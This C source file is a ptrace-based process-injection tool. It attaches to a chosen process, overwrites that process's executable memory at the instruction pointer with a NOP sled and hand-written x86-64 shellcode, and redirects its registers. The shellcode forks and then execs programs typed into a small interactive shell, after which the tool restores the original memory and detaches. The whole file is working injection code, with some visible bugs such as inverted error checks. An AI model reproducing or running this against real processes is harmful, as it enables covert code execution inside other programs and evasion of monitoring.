#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>	


typedef struct payload{
	char *data;
	int length;
	unsigned long entrypoint;
	unsigned long argv;
} payload_t;


//this should be enough to clean up any bad instruction globbing with the previous bytes
const char *nopsled = "\x90\x90\x90\x90\x90\x90\x90\x90";
//const char *shellcode = "\x0f\x05\xcc";
//                     syscall    | cmp rax 0    |jmp +09  |mov rax 0x3b               |syscall|int| 
const char shellcode[] = "\x0f\x05\x48\x83\xf8\x00\x75\x09\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\xcc";
int shellcode_size = sizeof(shellcode);


//[filename][argv0][argv1][&argv0][&argv1][null ptr to terminate argv][nop sled][shellcode]
void build_payload(payload_t *payload, const char *filename, int argc, char *argv[], const char *shellcode, unsigned long rip){
	int i;
	int argv_base;
	payload->length = 0;
	//write filename
	payload->length += strlen(filename) + 1;
	memcpy(payload->data, filename, strlen(filename));
	payload->data[payload->length - 1] = '\0';
	argv_base = payload->length;
	//write argv characters
	for(i = 0; i < argc; i++){
		memcpy(payload->data + payload->length, argv[i], strlen(argv[i]));
		payload->length += strlen(argv[i]) + 1;
		payload->data[payload->length - 1] = '\0';
	}
	//write argv pointers
	payload->argv = rip + payload->length;
	for(i = 0; i < argc; i++){
		unsigned long pointer = rip + argv_base;
		char *bytes = (char *)&pointer;
		int j;
		for(j = 0; j < sizeof(payload); j++){
			payload->data[payload->length] = bytes[j];
			payload->length += 1;
		}
		argv_base += strlen(argv[i])+1;
	}
	//null terminate argv
	for(i = 0; i < sizeof(rip); i++){
			payload->data[payload->length] = '\0';
			payload->length += 1;
	}
	//write nopsled
	memcpy(payload->data + payload->length, nopsled, strlen(nopsled));
	payload->length += strlen(nopsled);
	//write payload
	payload->entrypoint = rip + payload->length;
	memcpy(payload->data + payload->length, shellcode, shellcode_size);
	payload->length += shellcode_size;
}


void print_payload(payload_t *payload){
	printf("Payload length: %d\n", payload->length);
	int i;
	for(i = 0; i < payload->length; i++){
		printf("%x ", payload->data[i] & 0xff);
	}
	printf("New rip entrypoint %lx\n", payload->entrypoint);
}

void run_program(pid_t target_pid, char *child_argv[], int child_argc){
	struct user_regs_struct regs;
	struct user_regs_struct og_regs;
	const char *filename = child_argv[0];
	payload_t payload;
	char payload_data[1024] = {'\0'};
	unsigned long og_data[128] = {};
	int og_data_length = 0;
	int status;
	payload.data = payload_data;
	if(ptrace(PTRACE_ATTACH, target_pid, NULL, NULL) != -1){
		perror("ptrace attach");
		//return 2;
	}
	
	if(waitpid(target_pid, &status, WSTOPPED) != target_pid){
		perror("waitpid");
		//return 3;
	}
	if (ptrace(PTRACE_GETREGS, target_pid, NULL, &regs) == -1) {
		perror("ptrace getregs");
	}
	og_regs = regs;
	printf("RIP: %llx\n", regs.rip);
	build_payload(&payload, filename, child_argc, child_argv, shellcode, regs.rip);
	print_payload(&payload);



	//Now we need to get the words of executable memory of the victim we are going to overwrite to save them for when we write back
	int i;
	for(i = 0; i < payload.length; i += sizeof(long)){
		unsigned long word = ptrace(PTRACE_PEEKDATA, target_pid, regs.rip + i, NULL);
		og_data[i/sizeof(long)] = word;
		og_data_length++;
	}
	printf("og data length %d\n", og_data_length);


	//Write out payload to executable memory of the victim
	for(i = 0; i < payload.length; i+= sizeof(long)){
		unsigned long word = *(unsigned long *)(payload.data+i);
		printf("%lx ", word);
		ptrace(PTRACE_POKEDATA, target_pid, regs.rip + i, word);
	}

	//Set up registers for execution of payload
	//rdi - filename, rsi - argv
	regs.rdi = regs.rip;
	regs.rsi = payload.argv;
	regs.rip = payload.entrypoint;	
	regs.rax = 0x39;
	regs.rdx = 0x0;

	if (ptrace(PTRACE_SETREGS, target_pid, NULL, &regs) == -1) {
		perror("ptrace setregs");
	}

	//Resume prococess execution
	ptrace(PTRACE_CONT, target_pid, NULL, NULL);


	//Wait for SIGTRAP from the 0xcc interrupt	
	waitpid(target_pid, &status, 0);
	if(WIFSTOPPED(status) && WSTOPSIG(status) == SIGTRAP){
		printf("Target process stopped.\n");
		//Rewrite memory
		for(i = 0; i < og_data_length; i++){	
			unsigned long word = og_data[i];
			ptrace(PTRACE_POKEDATA, target_pid, og_regs.rip + i*sizeof(word), word);
		}
		//Rewrite registers
		if (ptrace(PTRACE_SETREGS, target_pid, NULL, &og_regs) == -1) {
			perror("ptrace setregs");
		}
		//Detach ptrace
		if(ptrace(PTRACE_DETACH, target_pid, NULL, NULL) != -1){
			perror("ptrace detach");
		}
	}
}


pid_t make_child(){
	pid_t child_pid = fork();
	if(!child_pid){
		while(1){
			sleep(5);
		}
	}
	return child_pid;
}




int parse_line(char *line, char *argv[]){
	int i;
	int argc = 0;
	char *line_start = line;
	int line_length = strlen(line);
	for(i = 0; i < line_length; i++){
		if(line[i] == ' ' || line[i] == '\n'){
			argv[argc] = line_start;
			argc++;
			line_start = line + i+1;
			line[i] = '\0';
		}
			
	}
	return argc;
}


void shell_exec(int *target_pid, char *child_argv[], int child_argc){
	if(child_argc > 1 && !strcmp("setpid",child_argv[0])){
		*target_pid = atoi(child_argv[1]);
		printf("Set target pid to %d\n", *target_pid);
		return;
	}
	run_program(*target_pid, child_argv, child_argc);

}

int main(int argc, char *argv[]){
	pid_t target_pid;
	if(argc < 2){
		target_pid = make_child();
	} else {
		target_pid = atoi(argv[1]);
	}
	char line[4096] = {'\0'};
	char *child_argv[128] = {"\0"};
	int child_argc;
	while(1){
		printf("$ ");
		fgets(line, sizeof(line), stdin);
		if(strlen(line) == 1) continue;
		child_argc = parse_line(line, child_argv);
		shell_exec(&target_pid, child_argv, child_argc);
	}
}
